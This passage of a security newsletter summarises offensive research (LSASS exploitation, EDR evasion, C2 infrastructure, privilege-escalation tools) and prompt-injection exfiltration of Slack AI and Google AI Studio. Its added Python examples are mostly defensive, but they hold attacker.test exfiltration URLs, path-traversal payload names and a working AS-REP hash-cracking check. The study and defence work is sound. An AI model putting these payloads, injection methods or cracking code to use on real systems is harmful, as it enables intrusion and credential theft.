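def _as_list(x):
    return x if isinstance(x, list) else [x]

def _condition_values(condition, key):
    """Values bound to a condition key under StringEquals/StringLike (any ForAnyValue prefix)."""
    values = []
    for operator, kv in (condition or {}).items():
        if operator.split(':')[-1] not in ('StringEquals', 'StringLike'):
            continue
        for k, v in kv.items():
            if k.lower() == key.lower():
                values.extend(_as_list(v))
    return values

def _sub_is_weak(sub):
    """A sub pattern is weak when it is a bare wildcard or wildcards the org/repo part."""
    if sub == '*':
        return True
    if sub.startswith('repo:'):
        return '*' in sub.split(':', 2)[1]
    return False

def audit_trust_policy(policy):
    """Return a list of findings for an IAM role trust policy (dict or JSON string)."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    findings = []
    for i, st in enumerate(_as_list(policy.get('Statement', []))):
        if st.get('Effect') != 'Allow':
            continue
        actions = _as_list(st.get('Action', []))
        if not any(a in ('sts:AssumeRoleWithWebIdentity', 'sts:*', '*') for a in actions):
            continue
        principal = st.get('Principal', {})
        if principal == '*':
            findings.append(f'statement {i}: anonymous principal may assume this role')
            continue
        if not isinstance(principal, dict):
            continue
        if '*' in _as_list(principal.get('AWS', [])) + _as_list(principal.get('Federated', [])):
            findings.append(f'statement {i}: anonymous principal may assume this role')
            continue
        for fed in _as_list(principal.get('Federated', [])):
            if not fed.endswith('/' + GITHUB_ISSUER):
                continue   # other IdPs use other claim names; not modelled here
            cond = st.get('Condition')
            aud = _condition_values(cond, f'{GITHUB_ISSUER}:aud')
            sub = _condition_values(cond, f'{GITHUB_ISSUER}:sub')
            if aud != ['sts.amazonaws.com']:
                findings.append(f'statement {i}: aud is not pinned to sts.amazonaws.com')
            if not sub:
                findings.append(f'statement {i}: no sub condition, so a workflow in ANY '
                                f'GitHub repository can assume this role')
            elif any(_sub_is_weak(s) for s in sub):
                findings.append(f'statement {i}: sub pattern {sub} does not pin the repository')
    return findings

def _policy(condition):
    """Constructed trust policy with a placeholder account ID."""
    return {'Version': '2012-10-17', 'Statement': [{
        'Effect': 'Allow',
        'Principal': {'Federated': f'arn:aws:iam::123456789012:oidc-provider/{GITHUB_ISSUER}'},
        'Action': 'sts:AssumeRoleWithWebIdentity',
        'Condition': condition}]}

# Weak: issuer and audience are checked, but nothing says WHICH repository.
WEAK_POLICY = _policy({'StringEquals': {f'{GITHUB_ISSUER}:aud': 'sts.amazonaws.com'}})
# Fixed: the subject claim pins the organisation, repository and branch.
FIXED_POLICY = _policy({
    'StringEquals': {f'{GITHUB_ISSUER}:aud': 'sts.amazonaws.com'},
    'StringLike': {f'{GITHUB_ISSUER}:sub': 'repo:example-org/deploy:ref:refs/heads/main'}})
ANONYMOUS_POLICY = {'Version': '2012-10-17', 'Statement': [{
    'Effect': 'Allow', 'Principal': '*', 'Action': 'sts:AssumeRoleWithWebIdentity'}]}

if __name__ == '__main__':
    for name, pol in (('weak', WEAK_POLICY), ('fixed', FIXED_POLICY), ('anonymous', ANONYMOUS_POLICY)):
        print(name, audit_trust_policy(pol) or ['ok'])
```

Feed it the output of `aws iam get-role --query Role.AssumeRolePolicyDocument` for every role in the account; the subject claim is the only thing in a GitHub token that identifies the repository, so a policy without it is open to every GitHub user.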
Ghost in the PPL Part 2: From BYOVDLL to Arbitrary Code Execution in LSASS - In part 2 of the "Ghost in the PPL" series, the author discusses the "Bring Your Own Vulnerable DLL" technique to reintroduce known vulnerabilities in LSASS and achieve arbitrary code execution. The exploit involves using a use-after-free bug in the RPC procedure of the KeyIso service. The author explores various strategies, including bypassing Control Flow Guard, and leveraging RPC calls to coerce LSASS to open a process handle. Despite setbacks, the author successfully combines these techniques to achieve the final exploit, leading to the duplication of process handles and proving the effectiveness of the advanced exploitation technique.
BLUUID: Firewallas, Diabetics, And… Bluetooth - The blog explores the topic of identifying Bluetooth devices remotely and highlights the lack of oversight in healthcare devices using Bluetooth. It discusses vulnerabilities in firewall products and issues with BTLE enabled insulin pumps, showcasing the potential harm caused by BTLE vulnerabilities. The author demonstrates how to build a database of Bluetooth Low-Energy Generic Attribute Universally Unique Identifiers (UUIDs) for vulnerability research. A case study of exploiting vulnerabilities in Firewalla hardware and app is provided as a proof of concept, emphasizing the importance of understanding and addressing Bluetooth security and privacy concerns in the industry.
Data Exfiltration from Slack AI via indirect prompt injection - A vulnerability in Slack AI allows attackers to steal data from private channels by manipulating the language model used for content generation. This can be done through indirect prompt injection, where the attacker can prompt Slack AI to exfiltrate data from private channels they are not a part of.
Google AI Studio: LLM-Powered Data Exfiltration Hits Again! Quickly Fixed. - Recently, a data exfiltration vulnerability was discovered in Google AI Studio, allowing for information to be leaked via image rendering during prompt injection. The exploit was quickly fixed after it was reported. The vulnerability involved using HTML img tags to exfiltrate data, with the exploit demonstrated using performance reviews uploaded to the platform. The issue was remedied within 24 hours by Google, highlighting the importance of addressing novel threats like data exfiltration via image rendering.
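Both of the issues above depend on the same output channel: a rendered image is a request the victim never clicks, so any URL the model can be induced to emit is an exfiltration path. The Python below is an added example, not Slack's or Google's fix, showing an output-side filter that strips Markdown and HTML images whose host is not on an allowlist and reports what it removed. The allowlisted host, the attacker domain and the sample model output are constructed.

```python
import re
from urllib.parse import urlsplit

# Hosts an assistant's rendered output may load images from (assumed allowlist;
# pair it with a Content-Security-Policy img-src on the page that renders the text).
ALLOWED_IMAGE_HOSTS = {'images.example.com'}

# ![alt](url "title") in Markdown, and <img ... src=...> in HTML (quoted or bare).
_MD_IMG = re.compile(r'!\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)')
_HTML_IMG = re.compile(r'<img\b[^>]*?\bsrc\s*=\s*([\'"]?)([^\'"\s>]+)\1[^>]*>', re.I)

def _allowed(url):
    parts = urlsplit(url.strip())
    return parts.scheme == 'https' and (parts.hostname or '').lower() in ALLOWED_IMAGE_HOSTS

def sanitize_model_output(text):
    """Strip images whose source is not allowlisted; return (clean_text, blocked_urls).

    A rendered image is a zero-click request, so a URL the model was induced to
    emit (with secrets in the query string) would fire the moment the chat is displayed.
    """
    blocked = []

    def md(m):
        alt, url = m.group(1), m.group(2)
        if _allowed(url):
            return m.group(0)
        blocked.append(url)
        return f'[image removed: {alt or "untrusted source"}]'

    def html(m):
        url = m.group(2)
        if _allowed(url):
            return m.group(0)
        blocked.append(url)
        return '[image removed]'

    clean = _MD_IMG.sub(md, text)
    clean = _HTML_IMG.sub(html, clean)
    return clean, blocked

# Constructed model output: the injected instruction made the model encode a secret
# into an image URL; the chart from the allowlisted CDN is legitimate.
SAMPLE_OUTPUT = (
    "Here is the summary you asked for.\n"
    "![loading](https://attacker.test/log?data=API_KEY%3Dsk-constructed-123)\n"
    "<img src='https://attacker.test/p.png?review=needs+improvement' width=1>\n"
    "![Q3 chart](https://images.example.com/q3.png)\n"
)

if __name__ == '__main__':
    clean, blocked = sanitize_model_output(SAMPLE_OUTPUT)
    print(clean)
    print('blocked:', blocked)
```

The blocked list is worth logging and alerting on: a model that starts emitting image URLs to unknown hosts is the clearest signal that an injected instruction reached it.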
CVE-2024-22263: Spring Cloud Dataflow Arbitrary File Writing - In August 2024, a vulnerability (CVE-2024-22263) was discovered in Spring Cloud Data Flow's Skipper server component, allowing attackers to write arbitrary files to the server's filesystem. The issue was caused by insufficient path sanitization in the upload process. A patch was released to address this by reordering the validation process and sanitizing user inputs to prevent unauthorized file writes. Users are advised to update to fixed versions to mitigate the risk of exploitation and protect their systems from potential attacks.
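Both the BYOB exfiltration endpoint above and the Skipper upload path are instances of the same bug: a client-supplied file name joined onto a base directory without checking where the result lands. The Python below is an added example (not code from either project) that shows the vulnerable join beside a hardened one, which resolves the candidate path, including symlinks, refuses anything that does not remain under the base directory, and then writes with O_EXCL so an existing file is never overwritten. The attacker inputs are constructed and the demo runs entirely inside a temporary directory.

```python
import os
import posixpath
import tempfile
from pathlib import Path

class UnsafePathError(ValueError):
    pass

def vulnerable_target(base_dir, user_path):
    """The bug in miniature: os.path.join discards base_dir on an absolute input and
    keeps '..' segments, so a client-supplied name can pick any file on disk."""
    return os.path.normpath(os.path.join(base_dir, user_path))

def safe_join(base_dir, user_path):
    """Map a client-supplied relative name to a path guaranteed to lie under base_dir."""
    if '\x00' in user_path:
        raise UnsafePathError('NUL byte in path')
    rel = user_path.replace('\\', '/')            # treat Windows separators as separators
    first = rel.split('/', 1)[0]
    if posixpath.isabs(rel) or ':' in first:       # '/etc/...', 'C:/...'
        raise UnsafePathError('absolute path not allowed')
    base = Path(base_dir).resolve()
    candidate = (base / rel).resolve()             # collapses '..' and follows symlinks
    try:
        candidate.relative_to(base)
    except ValueError:
        raise UnsafePathError('path escapes the upload directory') from None
    return candidate

def store_upload(base_dir, user_path, data):
    """Write data at the validated location; never overwrite, never follow a final symlink."""
    target = safe_join(base_dir, user_path)
    target.parent.mkdir(parents=True, exist_ok=True)
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, 'O_NOFOLLOW', 0)
    fd = os.open(target, flags, 0o600)
    with os.fdopen(fd, 'wb') as fh:
        fh.write(data)
    return target

# Constructed attacker inputs of the kinds both advisories describe.
BAD_NAMES = ['../../etc/cron.d/job', '/etc/cron.d/job', 'a/../../job',
             'a\\..\\..\\job', 'C:/Windows/job', 'link/job', 'job\x00.txt']

def demo():
    """Store one good upload, then show each bad name is rejected by safe_join while
    several are accepted by the vulnerable join. Nothing is written outside the temp dir."""
    with tempfile.TemporaryDirectory() as d:
        os.symlink(os.path.dirname(d), os.path.join(d, 'link'))   # symlink pointing out of base
        stored = store_upload(d, 'reports/2024/q3.txt', b'ok').read_bytes()
        rejected, vulnerable_escapes = [], []
        for name in BAD_NAMES:
            try:
                safe_join(d, name)
            except UnsafePathError:
                rejected.append(name)
            if '\x00' not in name and not vulnerable_target(d, name).startswith(d + os.sep):
                vulnerable_escapes.append(name)
        return {'stored': stored, 'rejected': rejected, 'vulnerable_escapes': vulnerable_escapes}

if __name__ == '__main__':
    print(demo())
```

Note what the lexical check in `vulnerable_target` cannot see: `link/job` stays textually inside the base directory yet lands outside it once the symlink is followed, which is why `safe_join` compares resolved paths rather than strings.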
Memory corruption vulnerabilities in Suricata and FreeRDP - Kaspersky discovered memory corruption vulnerabilities in Suricata and FreeRDP through penetration testing before releasing their products Kaspersky Thin Client and Kaspersky IoT Secure Gateway. They found multiple vulnerabilities in these open-source components and reported them to the developers. The community confirmed the issues and registered CVEs for them. Kaspersky provided details of the vulnerabilities and shared fuzzing tests with the communities, leading to patches being issued for the vulnerabilities. It is recommended to update to the latest versions of Suricata and FreeRDP to mitigate these vulnerabilities.
You just got vectored – Using Vectored Exception Handlers (VEH) for defense evasion and process injection - Vectored Exception Handlers (VEH) have been used in malware for over a decade and have recently gained attention from the offensive security industry. Researchers have explored how VEH can be manipulated for defense evasion and process injection. By manually manipulating the VEH list, users can add their own exception handlers to evade security defenses. EDR products also use VEH, so it is important to prevent tampering with the VEH list. VEH manipulation can be used for threadless process injection, bypassing the need for execution primitives. It is important to be aware of the implications of VEH manipulation and to detect any malicious activity involving VEH.
CVE-2022-22265 Samsung npu driver - The blog post discusses the exploitation of a bug in the Samsung npu driver using CVE-2022-22265. The post provides a detailed explanation of the vulnerability, the exploitation strategy, and code snippets involved. The exploitation involves triggering a double free vulnerability in the npu driver to gain control and achieve local privilege escalation. The post also discusses techniques such as memory spraying, PTE manipulation, and code injection to achieve the desired outcome of obtaining reverse root shell access. The author aims to improve the exploit's reliability by replacing the signalfd structure and enhancing the cross-cache process.
Try it for yourself: the latest PortSwigger Research from Black Hat USA - PortSwigger Research released three groundbreaking research findings at Black Hat USA, addressing web application security threats. Techniques like web timing attacks, email parsing discrepancies, and web cache exploitation were explored. Users can try these techniques out in Burp Suite Professional and access new labs in the Web Security Academy. The research aims to drive innovation in Burp Suite and equip users with the latest tools for detecting vulnerabilities.
CSRF: A complete guide to exploiting advanced CSRF vulnerabilities - This article provides a comprehensive guide on exploiting advanced CSRF vulnerabilities, including basic and advanced exploitation methods. It explains how CSRF vulnerabilities work and the conditions that make a web application vulnerable to CSRF attacks. The article also introduces tools that can automate CSRF attacks and includes practice scenarios for readers to test their skills.
OWASP TOP 10: Insufficient Attack Protection #7 – CAPTCHA Bypass - The blog discusses the vulnerability of CAPTCHA bypass attacks and the importance of CAPTCHA in protecting websites from automated bots. It explains the risks, implications, and methods attackers use to bypass CAPTCHA. The blog also provides solutions and best practices to strengthen CAPTCHA security, including choosing well-designed CAPTCHA systems, implementing them correctly, and protecting CAPTCHA keys. Additionally, it covers common design and implementation issues that lead to CAPTCHA bypass and provides examples of how attackers can exploit them.
Streaming vulnerabilities from Windows Kernel - Proxying to Kernel - Part I - DEVCORE recently examined the Microsoft Kernel Streaming Service (MSKSSRV) in the Windows kernel and found multiple vulnerabilities usable for privilege escalation. Part II will continue the work by exploring the Kernel Streaming attack surface further.
NTLM Credential Theft in Python Windows Applications - Horizon3 research into NTLM credential theft from Python applications running on Windows.
Traccar 5 Remote Code Execution Vulnerabilities - Horizon3.ai reported Traccar 5 Remote Code Execution Vulnerabilities, which could be exploited by unauthenticated attackers if guest registration is enabled.
Monke's Guide to Bug Bounty Methodology - Ciarán, also known as Monke, shares his guide to bug bounty methodology, aimed at new hackers struggling to be consistent. He emphasizes the importance of having a methodology, which includes approaches, persistence, and execution order. He recommends tools like Caido and Burp Suite for bug hunting and stresses the need for patience, consistency, and collaboration in the bug bounty community.
Cobalt Strike - CDN / Reverse Proxy Setup - The author walks through building Cobalt Strike C2 infrastructure behind a CDN with Nginx as a reverse proxy. They stress choosing a high-reputation domain for the C2 front, then step through configuring the Azure components, Nginx, and Cobalt Strike itself. Malleable C2 profiles are used to shape and disguise beacon traffic, and the post ends by testing the chain end to end. The result hides the team server behind a reputable CDN edge and a filtering reverse proxy, so only traffic matching the profile ever reaches it.
Tools and Exploits
Breach the Gates - Initial Access Craft in 2024 - The repository holds the resources accompanying the presentation "Breach the Gates, Advanced Initial Access in 2024" given at OffensiveX in Athens in June 2024.
TrickDump - The TrickDump GitHub repository contains a tool that dumps the lsass process using only NTAPIs, producing three JSON files and one ZIP file of memory region dumps rather than a Minidump. The work is split into three steps: gather OS information, obtain SeDebugPrivilege, and dump the memory regions. Because no valid Minidump file ever exists on disk, in memory, or on the wire, and each step runs as a separate program, the technique gives detection tooling less to key on.
ASRepCatcher - The GitHub repository "ASRepCatcher" by user Yaxxine7 is a tool designed to use ARP spoofing to catch AS-REP messages returned by the Domain Controller to clients and prints out the hash to crack. The tool works for all users on the VLAN and has features for both relay mode and listen mode. Users can disable ARP spoofing or use their own spoofing method if preferred. The tool requires at least Python 3.7 to run.
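What a tool like ASRepCatcher hands to the cracker is the RC4-HMAC (etype 23) enc-part of the AS-REP, formatted as a hashcat mode 18200 line. The following is an added example, not ASRepCatcher's own code: it builds that line from a captured enc-part and then performs the per-guess check a cracker runs against it (derive the NT hash, derive K1 for key usage 8 and K3 from the checksum, RC4-decrypt, recompute the HMAC-MD5). The user, realm, password and plaintext are constructed for the demo; a real enc-part carries a DER-encoded EncASRepPart, and MD4 is implemented in pure Python because OpenSSL 3 only ships it in the legacy provider.

```python
import hashlib
import hmac
import struct

# Constructed demo values (not captured traffic).
SAMPLE_USER, SAMPLE_REALM, SAMPLE_PASSWORD = "alice", "CORP.LOCAL", "password"
ASREP_KEY_USAGE = 8  # RFC 4757: usage 3 (AS-REP enc-part) is remapped to 8 for RC4-HMAC


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); OpenSSL 3 only provides MD4 in its legacy provider."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (F, 0x00000000, range(16), (3, 7, 11, 19)),
        (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, const, ks, ss in rounds:
            for i, k in enumerate(ks):
                a = _lrot((a + fn(b, c, d) + X[k] + const) & 0xFFFFFFFF, ss[i % 4])
                a, b, c, d = d, a, b, c  # rotate the working variables as in the spec
        a, b = (a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF
        c, d = (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key is the NT hash: MD4(UTF-16LE(password))."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _k1(key: bytes, usage: int) -> bytes:
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757: output = HMAC-MD5(K1, conf||pt) || RC4(K3, conf||pt), K3 = HMAC-MD5(K1, checksum)."""
    k1 = _k1(key, usage)
    data = confounder + plaintext
    checksum = hmac.new(k1, data, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum + rc4(k3, data)


def asrep_to_hashcat(user: str, realm: str, enc_part: bytes) -> str:
    """hashcat mode 18200 line: the first 16 bytes are the checksum, the rest the ciphertext."""
    if len(enc_part) <= 16:
        raise ValueError("enc-part too short to be RC4-HMAC ciphertext")
    return f"$krb5asrep$23${user}@{realm}:{enc_part[:16].hex()}${enc_part[16:].hex()}"


def verify_candidate(line: str, password: str) -> bool:
    """One cracker guess: derive K1/K3 from the candidate's NT hash, decrypt, recheck the HMAC."""
    _, tag, etype, rest = line.split("$", 3)
    if tag != "krb5asrep" or etype != "23":
        raise ValueError("not an etype-23 AS-REP line")
    checksum_hex, data_hex = rest.split(":", 1)[1].split("$")
    checksum, data = bytes.fromhex(checksum_hex), bytes.fromhex(data_hex)
    k1 = _k1(nt_hash(password), ASREP_KEY_USAGE)
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    plain = rc4(k3, data)  # confounder || EncASRepPart
    return hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum)


def build_sample_line() -> str:
    """Constructed AS-REP enc-part for SAMPLE_USER; a real one carries DER EncASRepPart."""
    enc_part = rc4_hmac_encrypt(nt_hash(SAMPLE_PASSWORD), ASREP_KEY_USAGE,
                                b"constructed EncASRepPart placeholder", bytes(range(8)))
    return asrep_to_hashcat(SAMPLE_USER, SAMPLE_REALM, enc_part)


if __name__ == "__main__":
    line = build_sample_line()
    print(line)
    print("right password:", verify_candidate(line, SAMPLE_PASSWORD))
    print("wrong password:", verify_candidate(line, "Winter2024!"))
```

The only secret in the exchange is the user's NT hash, which is why the cracker never needs the KDC: everything else in the line is public, and the HMAC check fails or succeeds per guess offline. Accounts with pre-authentication disabled, or any client on the VLAN whose AS-REP can be intercepted as the tool does, are exposed to exactly this check; enforcing AES-only etypes and long passwords is what raises the cost.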
Azure Tiering - This GitHub repository contains a project focused on Azure administrative tiering based on known attack paths. The project provides a better understanding of security implications and serves as a base for further development, allowing for the customization of tier models based on specific business requirements and governance strategies. The project categorizes administrative assets in Microsoft Graph and Azure based on testing their effective capabilities and warns that the research project may not be flawless or complete, with the maintenance being based on best effort.
Hookchain - The article introduces HookChain, a technique that combines IAT Hooking techniques, dynamic SSN resolution, and indirect system calls to evade traditional EDR systems effectively. It redirects the execution flow of Windows subsystems invisibly to EDRs that only act on Ntdll.dll without requiring changes to source code.
RogueApps - This GitHub repository, huntresslabs/rogueapps, documents observed OAuth application tradecraft when good OAuth apps go rogue. It provides information on the TTPs associated with OIDC/OAuth 2.0 application attacks and encourages contributions to the project by following the Wiki Contribution Guide. Users can clone the repository, install Node modules, and start a local dev server to test new RogueApps before they are pushed to production. Additionally, users can access the RogueApps dataset via a curl command to the GitHub content.
DeadPotato - DeadPotato is a privilege escalation utility for Windows that leverages the SeImpersonate right to obtain SYSTEM privileges. It has been customized from the original GodPotato source code by BeichenDream and offers various modules for different purposes, such as executing commands, creating new administrator users, and dumping SAM hashes. Users need to ensure the SeImpersonatePrivilege right is enabled in their context to use DeadPotato effectively. The tool warns against unauthorized use and advises caution when using it.
Leaked Wallpaper - This GitHub repository contains a proof of concept for a privilege escalation issue fixed in KB5040434. It leaks a user's NetNTLM hash from any session on the machine, even when run from a low-privileged account, so a privileged administrator's NetNTLM hash can be obtained from an unprivileged one and taken offline for cracking or relay.
ShimMe - Invokes an RPC method in OfficeClickToRun service that will inject a DLL into a suspended process running as NT AUTHORITY\SYSTEM launched by the task scheduler service, thus achieving privilege escalation from administrator to SYSTEM.
koppeling-p - GitHub repository klezVirus/koppeling-p is an extension of Nick Landers' project on adaptive DLL hijacking and dynamic export forwarding with EAT preservation. It preserves the target DLL's export address table during cloning, and is intended as a base for more advanced libraries and ongoing research. The project is written in Python.
Shwmae - Shwmae (shuh-my) is a Windows Hello abuse tool that was released during DEF CON 32 as part of the Abusing Windows Hello Without a Severed Hand talk. The purpose of the tool is to abuse Windows Hello from a privileged user context.
QuickShell - The GitHub repository SafeBreach-Labs/QuickShell contains a library and tools for exploiting and communicating with Google's Quick Share devices. The tools included in the repository demonstrate critical vulnerabilities in Quick Share and include a Remote Code Execution (RCE) attack chain tool. The project was presented at DEF CON 32 in 2024 and aims to improve security by identifying and addressing vulnerabilities in Quick Share.
Tempest - Tempest is a command and control framework written in Rust for research purposes. It is designed for learning and experimentation rather than production operations. The project is a work in progress and moves at a slower pace due to the research-focused approach. Users are encouraged to fork the project, modify it, or use it as a reference to create their own command and control frameworks. The framework includes features like a Terminal User Interface (TUI), AI modules, hardening of authentication, and various communication protocols.
TrailShark: Understanding AWS API and Service Interactions - TrailShark is an open-source plugin that connects Wireshark with AWS CloudTrail logs to analyze API calls and identify vulnerabilities in AWS accounts.
ixode - The GitHub repository "ixode" contains an exploit for a vulnerability in the Linux n_gsm line discipline code. The exploit triggers a KASAN splat and must be run as root. Reproducing it requires a specific kernel config from Ubuntu LTS and some environment setup steps described in the repository.
SIMurai - SIMurai is a software platform designed for security-focused SIM exploration and experimentation. At its core, it offers a versatile software SIM implementation that can be integrated into various environments for advanced testing and development.
Blinks: Burp Headless Scanning Tool - Blinks is a Burp Suite extension that automates active scanning and enhances functionality with the integration of webhooks to send real-time updates when new issues are identified. This allows for instant actionable insights without waiting for final reports. The tool is compatible with Burp Suite Pro and offers features like single and batch URL processing, customizable report generation, webhook integration, crawl-only mode, SOCKS5 proxy support, and the ability to attach additional extensions.
SpoofDPI - This GitHub project is SpoofDPI, a simple and fast anti-censorship tool written in Go that is designed to bypass Deep Packet Inspection. It can be installed on different operating systems using the commands in the README. SpoofDPI works by splitting the request so that only its first byte goes out in the initial TCP segment, with the rest following, which defeats DPI that classifies a connection from the first segment alone; inspection that reassembles the stream is not fooled by this.
Windows Downdate - WindowsDowndate is a tool that can manipulate Windows Updates to create custom downgrades and uncover previously fixed vulnerabilities.
New to Me and Miscellaneous
This section is for news, techniques, write-ups, tools, and off-topic items that weren't released last week but are new to me. Perhaps you missed them too!
Reckoning: Part 1 — The Landscape - The first part of the series explores how JavaScript-first frontend culture led to the degradation of US public services, particularly in regards to mobile accessibility. The post discusses the challenges faced by browser developers in adapting to the mobile market and the shortcomings of using legacy desktop-oriented JavaScript frameworks on the mobile web. The piece highlights the failure of web developers to adapt to the changing landscape of mobile usage and the negative impact of bloated scripts on low-end devices.
Phrack #71 - Phrack Magazine's introduction discusses the dangers of hype-driven technology implementation and the importance of understanding systems. The issue includes topics such as MPEG-CENC defects, bypassing security measures with programming, PostgreSQL injections, exploits, reversing dart AOT snapshots, and more.
Harnessing the Power of Cobalt Strike Profiles for EDR Evasion - The article discusses the importance of customized Malleable C2 profiles in the Cobalt Strike framework for EDR evasion, demonstrating techniques to improve profiles for Red-Team engagements. It explores bypassing memory scanners, static signatures, YARA rules, and sophisticated EDR solutions like Sophos.
On Leadership & Staying Technical - The author discusses the importance of maintaining technical skills while transitioning into leadership roles, emphasizing the benefits of staying technical for career flexibility and credibility. They outline a continuous journey of technical skill development, emphasizing the importance of hands-on experience, teaching others, and time management for skill building. The author also shares tips for overcoming mental resistance to learning and highlights the value of incremental skill development over time. Additionally, they offer advice on finding joy in the learning process and staying committed to skill development.
Hacking as a pathway to building better Products - Hacking can lead to the development of better products, as hackers challenge accepted truths and bring a different perspective to product design.
The Hidden Treasures of Crash Reports - In this blog post, Patrick Wardle discusses the importance of analyzing crash reports to reveal malware, bugs, and other valuable information. He highlights the significance of crash reports for defense and offense in cybersecurity, and provides examples of real-life crashes that exposed vulnerabilities in software. Crash reports are shown to be critical for developers, threat hunters, and malware analysts in identifying and fixing issues. The post also delves into specific examples of crashes and bugs found in macOS and iOS systems, emphasizing the usefulness of crash reports in uncovering critical security flaws.
Hot-Launch Yoga: Cobra Pose Reveals Nuke Repose - The Indian Navy has integrated yoga into its training and cultural practices for years, and recent social media posts and satellite imagery suggest that India may have retired its nuclear-capable Dhanush missiles from its naval forces. This retirement is likely due to the development of India's sea-based nuclear deterrent, with new ballistic missile submarines expected to be commissioned soon. The retirement of the Dhanush missiles has been confirmed through unique social media images, indicating a shift in India's nuclear arsenal.
Hacking a Virtual Power Plant - Ryan Castellucci recently shared his experience of hacking into a Virtual Power Plant through the API of his solar panels and battery storage system. The system authenticated with a 512-bit RSA key, a modulus size that has been practically factorable with public number field sieve tooling for many years, and he factored it. Castellucci responsibly disclosed the issue to the vendor and received a prompt response, with the company quickly fixing the problem by moving to a 4096-bit RSA key. He emphasizes the value of task-oriented cryptography libraries that keep non-experts from having to make parameter decisions, and is advocating for dropping support for 512-bit RSA keys in major cryptography libraries.
At Home In Your Firmware: Analysis of CVE-2024-36877 - The article explores a vulnerability in MSI firmware, specifically a buffer overflow in an SMM driver that allows attackers to execute arbitrary code. The process involves leveraging System Management Mode (SMM) to gain access to SMRAM, allowing for code execution in the firmware. The author provides a detailed analysis of the vulnerability and the steps taken to exploit it, including writing a stub loader to facilitate data copying in and out of SMRAM. The writeup showcases the complexities of SMM exploitation and firmware persistence, ending with an invitation for further collaboration or opportunities.
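The Virtual Power Plant item above turns on a key that should never have been accepted. As an added example (not the vendor's or the author's code), the block below is the import-time check a library or service can apply: it parses a PKCS#1 RSAPublicKey DER structure (SEQUENCE { modulus INTEGER, publicExponent INTEGER }) without third-party dependencies and rejects any modulus below a policy minimum. The 2048-bit floor is an assumed policy value, the test keys are synthetic moduli built inline (not real key material), and the SubjectPublicKeyInfo wrapper found in `BEGIN PUBLIC KEY` PEM files is not handled here.

```python
# Added example: reject RSA public keys whose modulus is below a policy minimum.
MIN_RSA_BITS = 2048  # assumed policy floor; the vendor in the post moved to 4096 bits


def _der_read_len(buf: bytes, i: int):
    """Return (length, index of first content byte) for the DER length field at buf[i]."""
    first = buf[i]
    if first < 0x80:
        return first, i + 1
    n = first & 0x7F  # long form: number of following length bytes
    return int.from_bytes(buf[i + 1:i + 1 + n], "big"), i + 1 + n


def _der_read_int(buf: bytes, i: int):
    """Return (value, index after the element) for the DER INTEGER at buf[i]."""
    if buf[i] != 0x02:
        raise ValueError("expected INTEGER tag")
    length, start = _der_read_len(buf, i + 1)
    return int.from_bytes(buf[start:start + length], "big"), start + length


def rsa_public_key_bits(der: bytes) -> int:
    """Bit length of the modulus in a PKCS#1 RSAPublicKey DER encoding."""
    if der[0] != 0x30:
        raise ValueError("expected SEQUENCE tag")
    _, i = _der_read_len(der, 1)
    modulus, i = _der_read_int(der, i)
    _exponent, _ = _der_read_int(der, i)
    return modulus.bit_length()  # a leading 0x00 pad byte does not count


def check_rsa_key(der: bytes, minimum: int = MIN_RSA_BITS) -> bool:
    """True if the key meets the policy floor; a 512-bit key such as the post's fails."""
    return rsa_public_key_bits(der) >= minimum


# --- constructed test keys: synthetic moduli for the demo, not products of primes ---
def _der_len(n: int) -> bytes:
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _der_int(n: int) -> bytes:
    body = n.to_bytes((n.bit_length() + 8) // 8, "big")  # adds 0x00 pad when top bit is set
    return b"\x02" + _der_len(len(body)) + body


def make_rsa_public_key_der(modulus: int, exponent: int = 65537) -> bytes:
    body = _der_int(modulus) + _der_int(exponent)
    return b"\x30" + _der_len(len(body)) + body


def synthetic_modulus(bits: int) -> int:
    """Odd integer of exactly `bits` bits; only for exercising the parser."""
    return (1 << (bits - 1)) | 1


if __name__ == "__main__":
    for bits in (512, 1024, 2048, 4096):
        key = make_rsa_public_key_der(synthetic_modulus(bits))
        print(bits, "bits ->", "accepted" if check_rsa_key(key) else "rejected")
```

The parser is deliberately strict about tags so that a key in an unexpected encoding fails closed instead of being scored by whatever integer happens to come first; a real import path would also bound the total length and reject exponents of 1.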
